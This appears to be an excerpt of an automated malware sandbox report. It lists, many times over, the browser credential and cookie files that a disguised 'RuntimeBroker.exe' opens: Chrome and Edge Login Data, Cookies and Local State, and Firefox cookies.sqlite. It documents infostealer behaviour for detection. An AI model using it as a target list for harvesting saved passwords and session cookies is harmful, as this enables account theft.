                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
